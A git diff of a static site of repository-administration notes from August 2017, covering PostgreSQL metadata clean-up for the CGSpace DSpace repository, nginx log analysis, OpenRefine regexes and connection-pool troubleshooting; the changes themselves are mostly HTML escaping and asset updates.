<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -142,7 +142,7 @@ Then I cleaned up the author authorities and HTML characters in OpenRefine and s
<time datetime="2017-08-01T11:51:52+03:00">Tue Aug 01, 2017</time>
in
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/tags/notes/" rel="tag">Notes</a>
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
</p>
</header>
@ -215,7 +215,7 @@ Then I cleaned up the author authorities and HTML characters in OpenRefine and s
<li>I need to get an author list from the database for only the CGIAR Library community to send to Peter</li>
<li>It turns out that I had already used this SQL query in <a href="/cgspace-notes/2017-05">May, 2017</a> to get the authors from CGIAR Library:</li>
</ul>
<pre><code>dspace#= \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10568/93761', '10947/1', '10947/10', '10947/11', '10947/12', '10947/13', '10947/14', '10947/15', '10947/16', '10947/17', '10947/18', '10947/19', '10947/2', '10947/20', '10947/21', '10947/22', '10947/23', '10947/24', '10947/25', '10947/2512', '10947/2515', '10947/2516', '10947/2517', '10947/2518', '10947/2519', '10947/2520', '10947/2521', '10947/2522', '10947/2523', '10947/2524', '10947/2525', '10947/2526', '10947/2527', '10947/2528', '10947/2529', '10947/2530', '10947/2531', '10947/2532', '10947/2533', '10947/2534', '10947/2535', '10947/2536', '10947/2537', '10947/2538', '10947/2539', '10947/2540', '10947/2541', '10947/2589', '10947/26', '10947/2631', '10947/27', '10947/2708', '10947/2776', '10947/2782', '10947/2784', '10947/2786', '10947/2790', '10947/28', '10947/2805', '10947/2836', '10947/2871', '10947/2878', '10947/29', '10947/2900', '10947/2919', '10947/3', '10947/30', '10947/31', '10947/32', '10947/33', '10947/34', '10947/3457', '10947/35', '10947/36', '10947/37', '10947/38', '10947/39', '10947/4', '10947/40', '10947/4052', '10947/4054', '10947/4056', '10947/4068', '10947/41', '10947/42', '10947/43', '10947/4368', '10947/44', '10947/4467', '10947/45', '10947/4508', '10947/4509', '10947/4510', '10947/4573', '10947/46', '10947/4635', '10947/4636', '10947/4637', '10947/4638', '10947/4639', '10947/4651', '10947/4657', '10947/47', '10947/48', '10947/49', '10947/5', '10947/50', '10947/51', '10947/5308', '10947/5322', '10947/5324', '10947/5326', '10947/6', '10947/7', '10947/8', '10947/9'))) group by text_value order by count desc) to /tmp/cgiar-library-authors.csv with csv;
<pre tabindex="0"><code>dspace#= \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in (&#39;10568/93761&#39;, &#39;10947/1&#39;, &#39;10947/10&#39;, &#39;10947/11&#39;, &#39;10947/12&#39;, &#39;10947/13&#39;, &#39;10947/14&#39;, &#39;10947/15&#39;, &#39;10947/16&#39;, &#39;10947/17&#39;, &#39;10947/18&#39;, &#39;10947/19&#39;, &#39;10947/2&#39;, &#39;10947/20&#39;, &#39;10947/21&#39;, &#39;10947/22&#39;, &#39;10947/23&#39;, &#39;10947/24&#39;, &#39;10947/25&#39;, &#39;10947/2512&#39;, &#39;10947/2515&#39;, &#39;10947/2516&#39;, &#39;10947/2517&#39;, &#39;10947/2518&#39;, &#39;10947/2519&#39;, &#39;10947/2520&#39;, &#39;10947/2521&#39;, &#39;10947/2522&#39;, &#39;10947/2523&#39;, &#39;10947/2524&#39;, &#39;10947/2525&#39;, &#39;10947/2526&#39;, &#39;10947/2527&#39;, &#39;10947/2528&#39;, &#39;10947/2529&#39;, &#39;10947/2530&#39;, &#39;10947/2531&#39;, &#39;10947/2532&#39;, &#39;10947/2533&#39;, &#39;10947/2534&#39;, &#39;10947/2535&#39;, &#39;10947/2536&#39;, &#39;10947/2537&#39;, &#39;10947/2538&#39;, &#39;10947/2539&#39;, &#39;10947/2540&#39;, &#39;10947/2541&#39;, &#39;10947/2589&#39;, &#39;10947/26&#39;, &#39;10947/2631&#39;, &#39;10947/27&#39;, &#39;10947/2708&#39;, &#39;10947/2776&#39;, &#39;10947/2782&#39;, &#39;10947/2784&#39;, &#39;10947/2786&#39;, &#39;10947/2790&#39;, &#39;10947/28&#39;, &#39;10947/2805&#39;, &#39;10947/2836&#39;, &#39;10947/2871&#39;, &#39;10947/2878&#39;, &#39;10947/29&#39;, &#39;10947/2900&#39;, &#39;10947/2919&#39;, &#39;10947/3&#39;, &#39;10947/30&#39;, &#39;10947/31&#39;, &#39;10947/32&#39;, &#39;10947/33&#39;, &#39;10947/34&#39;, &#39;10947/3457&#39;, &#39;10947/35&#39;, &#39;10947/36&#39;, &#39;10947/37&#39;, &#39;10947/38&#39;, &#39;10947/39&#39;, &#39;10947/4&#39;, &#39;10947/40&#39;, &#39;10947/4052&#39;, &#39;10947/4054&#39;, &#39;10947/4056&#39;, &#39;10947/4068&#39;, &#39;10947/41&#39;, &#39;10947/42&#39;, &#39;10947/43&#39;, &#39;10947/4368&#39;, &#39;10947/44&#39;, &#39;10947/4467&#39;, &#39;10947/45&#39;, &#39;10947/4508&#39;, &#39;10947/4509&#39;, &#39;10947/4510&#39;, &#39;10947/4573&#39;, &#39;10947/46&#39;, &#39;10947/4635&#39;, &#39;10947/4636&#39;, &#39;10947/4637&#39;, &#39;10947/4638&#39;, &#39;10947/4639&#39;, &#39;10947/4651&#39;, &#39;10947/4657&#39;, &#39;10947/47&#39;, &#39;10947/48&#39;, &#39;10947/49&#39;, &#39;10947/5&#39;, &#39;10947/50&#39;, &#39;10947/51&#39;, &#39;10947/5308&#39;, &#39;10947/5322&#39;, &#39;10947/5324&#39;, &#39;10947/5326&#39;, &#39;10947/6&#39;, &#39;10947/7&#39;, &#39;10947/8&#39;, &#39;10947/9&#39;))) group by text_value order by count desc) to /tmp/cgiar-library-authors.csv with csv;
</code></pre><ul>
<li>Meeting with Peter and CGSpace team
<ul>
@ -242,7 +242,7 @@ Then I cleaned up the author authorities and HTML characters in OpenRefine and s
<li>I sent a message to the mailing list about the duplicate content issue with <code>/rest</code> and <code>/bitstream</code> URLs</li>
<li>Looking at the logs for the REST API on <code>/rest</code>, it looks like there is someone hammering doing testing or something on it&hellip;</li>
</ul>
<pre><code># awk '{print $1}' /var/log/nginx/rest.log.1 | sort -n | uniq -c | sort -h | tail -n 5
<pre tabindex="0"><code># awk &#39;{print $1}&#39; /var/log/nginx/rest.log.1 | sort -n | uniq -c | sort -h | tail -n 5
140 66.249.66.91
404 66.249.66.90
1479 50.116.102.77
@ -252,7 +252,7 @@ Then I cleaned up the author authorities and HTML characters in OpenRefine and s
<li>The top offender is 70.32.83.92 which is actually the same IP as ccafs.cgiar.org, so I will email the Macaroni Bros to see if they can test on DSpace Test instead</li>
<li>I&rsquo;ve enabled logging of <code>/oai</code> requests on nginx as well so we can potentially determine bad actors here (also to see if anyone is actually using OAI!)</li>
</ul>
<pre><code> # log oai requests
<pre tabindex="0"><code> # log oai requests
location /oai {
access_log /var/log/nginx/oai.log;
proxy_pass http://tomcat_http;
@ -266,20 +266,20 @@ Then I cleaned up the author authorities and HTML characters in OpenRefine and s
<ul>
<li>Run author corrections on CGIAR Library community from Peter</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i /tmp/authors-fix-523.csv -f dc.contributor.author -t correct -m 3 -d dspace -u dspace -p fuuuu
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/authors-fix-523.csv -f dc.contributor.author -t correct -m 3 -d dspace -u dspace -p fuuuu
</code></pre><ul>
<li>There were only three deletions so I just did them manually:</li>
</ul>
<pre><code>dspace=# delete from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value='C';
<pre tabindex="0"><code>dspace=# delete from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value=&#39;C&#39;;
DELETE 1
dspace=# delete from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value='WSSD';
dspace=# delete from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value=&#39;WSSD&#39;;
</code></pre><ul>
<li>Generate a new list of authors from the CGIAR Library community for Peter to look through now that the initial corrections have been done</li>
<li>Thinking about resource limits for PostgreSQL again after last week&rsquo;s CGSpace crash and related to a recently discussion I had in the comments of the <a href="https://wiki.lyrasis.org/display/cmtygp/DCAT+Meeting+April+2017">April, 2017 DCAT meeting notes</a></li>
<li>In that thread Chris Wilper suggests a new default of 35 max connections for <code>db.maxconnections</code> (from the current default of 30), knowing that <em>each DSpace web application</em> gets to use up to this many on its own</li>
<li>It would be good to approximate what the theoretical maximum number of connections on a busy server would be, perhaps by looking to see which apps use SQL:</li>
</ul>
<pre><code>$ grep -rsI SQLException dspace-jspui | wc -l
<pre tabindex="0"><code>$ grep -rsI SQLException dspace-jspui | wc -l
473
$ grep -rsI SQLException dspace-oai | wc -l
63
@ -320,37 +320,37 @@ $ grep -rsI SQLException dspace-xmlui | wc -l
<ul>
<li>I wanted to merge the various field variations like <code>cg.subject.system</code> and <code>cg.subject.system[en_US]</code> in OpenRefine but I realized it would be easier in PostgreSQL:</li>
</ul>
<pre><code>dspace=# select distinct text_value, text_lang from metadatavalue where resource_type_id=2 and metadata_field_id=254;
<pre tabindex="0"><code>dspace=# select distinct text_value, text_lang from metadatavalue where resource_type_id=2 and metadata_field_id=254;
</code></pre><ul>
<li>And actually, we can do it for other generic fields for items in those collections, for example <code>dc.description.abstract</code>:</li>
</ul>
<pre><code>dspace=# update metadatavalue set text_lang='en_US' where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'description' and qualifier = 'abstract') AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10568/93761', '10947/1', '10947/10', '10947/11', '10947/12', '10947/13', '10947/14', '10947/15', '10947/16', '10947/17', '10947/18', '10947/19', '10947/2', '10947/20', '10947/21', '10947/22', '10947/23', '10947/24', '10947/25', '10947/2512', '10947/2515', '10947/2516', '10947/2517', '10947/2518', '10947/2519', '10947/2520', '10947/2521', '10947/2522', '10947/2523', '10947/2524', '10947/2525', '10947/2526', '10947/2527', '10947/2528', '10947/2529', '10947/2530', '10947/2531', '10947/2532', '10947/2533', '10947/2534', '10947/2535', '10947/2536', '10947/2537', '10947/2538', '10947/2539', '10947/2540', '10947/2541', '10947/2589', '10947/26', '10947/2631', '10947/27', '10947/2708', '10947/2776', '10947/2782', '10947/2784', '10947/2786', '10947/2790', '10947/28', '10947/2805', '10947/2836', '10947/2871', '10947/2878', '10947/29', '10947/2900', '10947/2919', '10947/3', '10947/30', '10947/31', '10947/32', '10947/33', '10947/34', '10947/3457', '10947/35', '10947/36', '10947/37', '10947/38', '10947/39', '10947/4', '10947/40', '10947/4052', '10947/4054', '10947/4056', '10947/4068', '10947/41', '10947/42', '10947/43', '10947/4368', '10947/44', '10947/4467', '10947/45', '10947/4508', '10947/4509', '10947/4510', '10947/4573', '10947/46', '10947/4635', '10947/4636', '10947/4637', '10947/4638', '10947/4639', '10947/4651', '10947/4657', '10947/47', '10947/48', '10947/49', '10947/5', '10947/50', '10947/51', '10947/5308', '10947/5322', '10947/5324', '10947/5326', '10947/6', '10947/7', '10947/8', '10947/9')))
<pre tabindex="0"><code>dspace=# update metadatavalue set text_lang=&#39;en_US&#39; where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;description&#39; and qualifier = &#39;abstract&#39;) AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in (&#39;10568/93761&#39;, &#39;10947/1&#39;, &#39;10947/10&#39;, &#39;10947/11&#39;, &#39;10947/12&#39;, &#39;10947/13&#39;, &#39;10947/14&#39;, &#39;10947/15&#39;, &#39;10947/16&#39;, &#39;10947/17&#39;, &#39;10947/18&#39;, &#39;10947/19&#39;, &#39;10947/2&#39;, &#39;10947/20&#39;, &#39;10947/21&#39;, &#39;10947/22&#39;, &#39;10947/23&#39;, &#39;10947/24&#39;, &#39;10947/25&#39;, &#39;10947/2512&#39;, &#39;10947/2515&#39;, &#39;10947/2516&#39;, &#39;10947/2517&#39;, &#39;10947/2518&#39;, &#39;10947/2519&#39;, &#39;10947/2520&#39;, &#39;10947/2521&#39;, &#39;10947/2522&#39;, &#39;10947/2523&#39;, &#39;10947/2524&#39;, &#39;10947/2525&#39;, &#39;10947/2526&#39;, &#39;10947/2527&#39;, &#39;10947/2528&#39;, &#39;10947/2529&#39;, &#39;10947/2530&#39;, &#39;10947/2531&#39;, &#39;10947/2532&#39;, &#39;10947/2533&#39;, &#39;10947/2534&#39;, &#39;10947/2535&#39;, &#39;10947/2536&#39;, &#39;10947/2537&#39;, &#39;10947/2538&#39;, &#39;10947/2539&#39;, &#39;10947/2540&#39;, &#39;10947/2541&#39;, &#39;10947/2589&#39;, &#39;10947/26&#39;, &#39;10947/2631&#39;, &#39;10947/27&#39;, &#39;10947/2708&#39;, &#39;10947/2776&#39;, &#39;10947/2782&#39;, &#39;10947/2784&#39;, &#39;10947/2786&#39;, &#39;10947/2790&#39;, &#39;10947/28&#39;, &#39;10947/2805&#39;, &#39;10947/2836&#39;, &#39;10947/2871&#39;, &#39;10947/2878&#39;, &#39;10947/29&#39;, &#39;10947/2900&#39;, &#39;10947/2919&#39;, &#39;10947/3&#39;, &#39;10947/30&#39;, &#39;10947/31&#39;, &#39;10947/32&#39;, &#39;10947/33&#39;, &#39;10947/34&#39;, &#39;10947/3457&#39;, &#39;10947/35&#39;, &#39;10947/36&#39;, &#39;10947/37&#39;, &#39;10947/38&#39;, &#39;10947/39&#39;, &#39;10947/4&#39;, &#39;10947/40&#39;, &#39;10947/4052&#39;, &#39;10947/4054&#39;, &#39;10947/4056&#39;, &#39;10947/4068&#39;, &#39;10947/41&#39;, &#39;10947/42&#39;, &#39;10947/43&#39;, &#39;10947/4368&#39;, &#39;10947/44&#39;, &#39;10947/4467&#39;, &#39;10947/45&#39;, &#39;10947/4508&#39;, &#39;10947/4509&#39;, &#39;10947/4510&#39;, &#39;10947/4573&#39;, &#39;10947/46&#39;, &#39;10947/4635&#39;, &#39;10947/4636&#39;, &#39;10947/4637&#39;, &#39;10947/4638&#39;, &#39;10947/4639&#39;, &#39;10947/4651&#39;, &#39;10947/4657&#39;, &#39;10947/47&#39;, &#39;10947/48&#39;, &#39;10947/49&#39;, &#39;10947/5&#39;, &#39;10947/50&#39;, &#39;10947/51&#39;, &#39;10947/5308&#39;, &#39;10947/5322&#39;, &#39;10947/5324&#39;, &#39;10947/5326&#39;, &#39;10947/6&#39;, &#39;10947/7&#39;, &#39;10947/8&#39;, &#39;10947/9&#39;)))
</code></pre><ul>
<li>And on others like <code>dc.language.iso</code>, <code>dc.relation.ispartofseries</code>, <code>dc.type</code>, <code>dc.title</code>, etc&hellip;</li>
<li>Also, to move fields from <code>dc.identifier.url</code> to <code>cg.identifier.url[en_US]</code> (because we don&rsquo;t use the Dublin Core one for some reason):</li>
</ul>
<pre><code>dspace=# update metadatavalue set metadata_field_id = 219, text_lang = 'en_US' where resource_type_id = 2 AND metadata_field_id = 237;
<pre tabindex="0"><code>dspace=# update metadatavalue set metadata_field_id = 219, text_lang = &#39;en_US&#39; where resource_type_id = 2 AND metadata_field_id = 237;
UPDATE 15
</code></pre><ul>
<li>Set the text_lang of all <code>dc.identifier.uri</code> (Handle) fields to be NULL, just like default DSpace does:</li>
</ul>
<pre><code>dspace=# update metadatavalue set text_lang=NULL where resource_type_id = 2 and metadata_field_id = 25 and text_value like 'http://hdl.handle.net/10947/%';
<pre tabindex="0"><code>dspace=# update metadatavalue set text_lang=NULL where resource_type_id = 2 and metadata_field_id = 25 and text_value like &#39;http://hdl.handle.net/10947/%&#39;;
UPDATE 4248
</code></pre><ul>
<li>Also update the text_lang of <code>dc.contributor.author</code> fields for metadata in these collections:</li>
</ul>
<pre><code>dspace=# update metadatavalue set text_lang=NULL where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10568/93761', '10947/1', '10947/10', '10947/11', '10947/12', '10947/13', '10947/14', '10947/15', '10947/16', '10947/17', '10947/18', '10947/19', '10947/2', '10947/20', '10947/21', '10947/22', '10947/23', '10947/24', '10947/25', '10947/2512', '10947/2515', '10947/2516', '10947/2517', '10947/2518', '10947/2519', '10947/2520', '10947/2521', '10947/2522', '10947/2523', '10947/2524', '10947/2525', '10947/2526', '10947/2527', '10947/2528', '10947/2529', '10947/2530', '10947/2531', '10947/2532', '10947/2533', '10947/2534', '10947/2535', '10947/2536', '10947/2537', '10947/2538', '10947/2539', '10947/2540', '10947/2541', '10947/2589', '10947/26', '10947/2631', '10947/27', '10947/2708', '10947/2776', '10947/2782', '10947/2784', '10947/2786', '10947/2790', '10947/28', '10947/2805', '10947/2836', '10947/2871', '10947/2878', '10947/29', '10947/2900', '10947/2919', '10947/3', '10947/30', '10947/31', '10947/32', '10947/33', '10947/34', '10947/3457', '10947/35', '10947/36', '10947/37', '10947/38', '10947/39', '10947/4', '10947/40', '10947/4052', '10947/4054', '10947/4056', '10947/4068', '10947/41', '10947/42', '10947/43', '10947/4368', '10947/44', '10947/4467', '10947/45', '10947/4508', '10947/4509', '10947/4510', '10947/4573', '10947/46', '10947/4635', '10947/4636', '10947/4637', '10947/4638', '10947/4639', '10947/4651', '10947/4657', '10947/47', '10947/48', '10947/49', '10947/5', '10947/50', '10947/51', '10947/5308', '10947/5322', '10947/5324', '10947/5326', '10947/6', '10947/7', '10947/8', '10947/9')));
<pre tabindex="0"><code>dspace=# update metadatavalue set text_lang=NULL where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in (&#39;10568/93761&#39;, &#39;10947/1&#39;, &#39;10947/10&#39;, &#39;10947/11&#39;, &#39;10947/12&#39;, &#39;10947/13&#39;, &#39;10947/14&#39;, &#39;10947/15&#39;, &#39;10947/16&#39;, &#39;10947/17&#39;, &#39;10947/18&#39;, &#39;10947/19&#39;, &#39;10947/2&#39;, &#39;10947/20&#39;, &#39;10947/21&#39;, &#39;10947/22&#39;, &#39;10947/23&#39;, &#39;10947/24&#39;, &#39;10947/25&#39;, &#39;10947/2512&#39;, &#39;10947/2515&#39;, &#39;10947/2516&#39;, &#39;10947/2517&#39;, &#39;10947/2518&#39;, &#39;10947/2519&#39;, &#39;10947/2520&#39;, &#39;10947/2521&#39;, &#39;10947/2522&#39;, &#39;10947/2523&#39;, &#39;10947/2524&#39;, &#39;10947/2525&#39;, &#39;10947/2526&#39;, &#39;10947/2527&#39;, &#39;10947/2528&#39;, &#39;10947/2529&#39;, &#39;10947/2530&#39;, &#39;10947/2531&#39;, &#39;10947/2532&#39;, &#39;10947/2533&#39;, &#39;10947/2534&#39;, &#39;10947/2535&#39;, &#39;10947/2536&#39;, &#39;10947/2537&#39;, &#39;10947/2538&#39;, &#39;10947/2539&#39;, &#39;10947/2540&#39;, &#39;10947/2541&#39;, &#39;10947/2589&#39;, &#39;10947/26&#39;, &#39;10947/2631&#39;, &#39;10947/27&#39;, &#39;10947/2708&#39;, &#39;10947/2776&#39;, &#39;10947/2782&#39;, &#39;10947/2784&#39;, &#39;10947/2786&#39;, &#39;10947/2790&#39;, &#39;10947/28&#39;, &#39;10947/2805&#39;, &#39;10947/2836&#39;, &#39;10947/2871&#39;, &#39;10947/2878&#39;, &#39;10947/29&#39;, &#39;10947/2900&#39;, &#39;10947/2919&#39;, &#39;10947/3&#39;, &#39;10947/30&#39;, &#39;10947/31&#39;, &#39;10947/32&#39;, &#39;10947/33&#39;, &#39;10947/34&#39;, &#39;10947/3457&#39;, &#39;10947/35&#39;, &#39;10947/36&#39;, &#39;10947/37&#39;, &#39;10947/38&#39;, &#39;10947/39&#39;, &#39;10947/4&#39;, &#39;10947/40&#39;, &#39;10947/4052&#39;, &#39;10947/4054&#39;, &#39;10947/4056&#39;, &#39;10947/4068&#39;, &#39;10947/41&#39;, &#39;10947/42&#39;, &#39;10947/43&#39;, &#39;10947/4368&#39;, &#39;10947/44&#39;, &#39;10947/4467&#39;, &#39;10947/45&#39;, &#39;10947/4508&#39;, &#39;10947/4509&#39;, &#39;10947/4510&#39;, &#39;10947/4573&#39;, &#39;10947/46&#39;, &#39;10947/4635&#39;, &#39;10947/4636&#39;, &#39;10947/4637&#39;, &#39;10947/4638&#39;, &#39;10947/4639&#39;, &#39;10947/4651&#39;, &#39;10947/4657&#39;, &#39;10947/47&#39;, &#39;10947/48&#39;, &#39;10947/49&#39;, &#39;10947/5&#39;, &#39;10947/50&#39;, &#39;10947/51&#39;, &#39;10947/5308&#39;, &#39;10947/5322&#39;, &#39;10947/5324&#39;, &#39;10947/5326&#39;, &#39;10947/6&#39;, &#39;10947/7&#39;, &#39;10947/8&#39;, &#39;10947/9&#39;)));
UPDATE 4899
</code></pre><ul>
<li>Wow, I just wrote this baller regex facet to find duplicate authors:</li>
</ul>
<pre><code>isNotNull(value.match(/(CGIAR .+?)\|\|\1/))
<pre tabindex="0"><code>isNotNull(value.match(/(CGIAR .+?)\|\|\1/))
</code></pre><ul>
<li>This would be true if the authors were like <code>CGIAR System Management Office||CGIAR System Management Office</code>, which some of the CGIAR Library&rsquo;s were</li>
<li>Unfortunately when you fix these in OpenRefine and then submit the metadata to DSpace it doesn&rsquo;t detect any changes, so you have to edit them all manually via DSpace&rsquo;s &ldquo;Edit Item&rdquo;</li>
<li>Ooh! And an even more interesting regex would match <em>any</em> duplicated author:</li>
</ul>
<pre><code>isNotNull(value.match(/(.+?)\|\|\1/))
<pre tabindex="0"><code>isNotNull(value.match(/(.+?)\|\|\1/))
</code></pre><ul>
<li>Which means it can also be used to find items with duplicate <code>dc.subject</code> fields&hellip;</li>
<li>Finally sent Peter the final dump of the CGIAR System Organization community so he can have a last look at it</li>
@ -365,12 +365,12 @@ UPDATE 4899
<li>Uptime Robot said CGSpace went down for 1 minute, not sure why</li>
<li>Looking in <code>dspace.log.2017-08-17</code> I see some weird errors that might be related?</li>
</ul>
<pre><code>2017-08-17 07:55:31,396 ERROR net.sf.ehcache.store.DiskStore @ cocoon-ehcacheCache: Could not read disk store element for key PK_G-aspect-cocoon://DRI/12/handle/10568/65885?pipelinehash=823411183535858997_T-Navigation-3368194896954203241. Error was invalid stream header: 00000000
<pre tabindex="0"><code>2017-08-17 07:55:31,396 ERROR net.sf.ehcache.store.DiskStore @ cocoon-ehcacheCache: Could not read disk store element for key PK_G-aspect-cocoon://DRI/12/handle/10568/65885?pipelinehash=823411183535858997_T-Navigation-3368194896954203241. Error was invalid stream header: 00000000
java.io.StreamCorruptedException: invalid stream header: 00000000
</code></pre><ul>
<li>Weird that these errors seem to have started on August 11th, the same day we had capacity issues with PostgreSQL:</li>
</ul>
<pre><code># grep -c &quot;ERROR net.sf.ehcache.store.DiskStore&quot; dspace.log.2017-08-*
<pre tabindex="0"><code># grep -c &#34;ERROR net.sf.ehcache.store.DiskStore&#34; dspace.log.2017-08-*
dspace.log.2017-08-01:0
dspace.log.2017-08-02:0
dspace.log.2017-08-03:0
@ -412,13 +412,13 @@ dspace.log.2017-08-17:584
<li>More information about authority framework: <a href="https://wiki.lyrasis.org/display/DSPACE/Authority+Control+of+Metadata+Values">https://wiki.lyrasis.org/display/DSPACE/Authority+Control+of+Metadata+Values</a></li>
<li>Wow, I&rsquo;m playing with the AGROVOC SPARQL endpoint using the <a href="https://github.com/tialaramex/sparql-query">sparql-query tool</a>:</li>
</ul>
<pre><code>$ ./sparql-query http://202.45.139.84:10035/catalogs/fao/repositories/agrovoc
<pre tabindex="0"><code>$ ./sparql-query http://202.45.139.84:10035/catalogs/fao/repositories/agrovoc
sparql$ PREFIX skos: &lt;http://www.w3.org/2004/02/skos/core#&gt;
SELECT
?label
WHERE {
{ ?concept skos:altLabel ?label . } UNION { ?concept skos:prefLabel ?label . }
FILTER regex(str(?label), &quot;^fish&quot;, &quot;i&quot;) .
FILTER regex(str(?label), &#34;^fish&#34;, &#34;i&#34;) .
} LIMIT 10;
┌───────────────────────┐
@ -452,7 +452,7 @@ WHERE {
<li>Since I cleared the XMLUI cache on 2017-08-17 there haven&rsquo;t been any more <code>ERROR net.sf.ehcache.store.DiskStore</code> errors</li>
<li>Look at the CGIAR Library to see if I can find the items that have been submitted since May:</li>
</ul>
<pre><code>dspace=# select * from metadatavalue where metadata_field_id=11 and date(text_value) &gt; '2017-05-01T00:00:00Z';
<pre tabindex="0"><code>dspace=# select * from metadatavalue where metadata_field_id=11 and date(text_value) &gt; &#39;2017-05-01T00:00:00Z&#39;;
metadata_value_id | item_id | metadata_field_id | text_value | text_lang | place | authority | confidence
-------------------+---------+-------------------+----------------------+-----------+-------+-----------+------------
123117 | 5872 | 11 | 2017-06-28T13:05:18Z | | 1 | | -1
@ -465,7 +465,7 @@ WHERE {
<li>According to <code>dc.date.accessioned</code> (metadata field id 11) there have only been five items submitted since May</li>
<li>These are their handles:</li>
</ul>
<pre><code>dspace=# select handle from item, handle where handle.resource_id = item.item_id AND item.item_id in (select item_id from metadatavalue where metadata_field_id=11 and date(text_value) &gt; '2017-05-01T00:00:00Z');
<pre tabindex="0"><code>dspace=# select handle from item, handle where handle.resource_id = item.item_id AND item.item_id in (select item_id from metadatavalue where metadata_field_id=11 and date(text_value) &gt; &#39;2017-05-01T00:00:00Z&#39;);
handle
------------
10947/4658
@ -490,7 +490,7 @@ WHERE {
<li>I asked Sisay about this and hinted that he should go back and fix these things, but let&rsquo;s see what he says</li>
<li>Saw CGSpace go down briefly today and noticed SQL connection pool errors in the dspace log file:</li>
</ul>
<pre><code>ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL connection Error
<pre tabindex="0"><code>ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL connection Error
org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error Timeout waiting for idle object
</code></pre><ul>
<li>Looking at the logs I see we have been having hundreds or thousands of these errors a few times per week in 2017-07 and almost every day in 2017-08</li>
@ -517,15 +517,15 @@ org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -32,7 +32,7 @@ Linode sent an alert that CGSpace (linode18) was using 261% CPU for the past two
Ask Sisay to clean up the WLE approvers a bit, as Marianne&rsquo;s user account is both in the approvers step as well as the group
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -62,12 +62,12 @@ Ask Sisay to clean up the WLE approvers a bit, as Marianne&rsquo;s user account
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
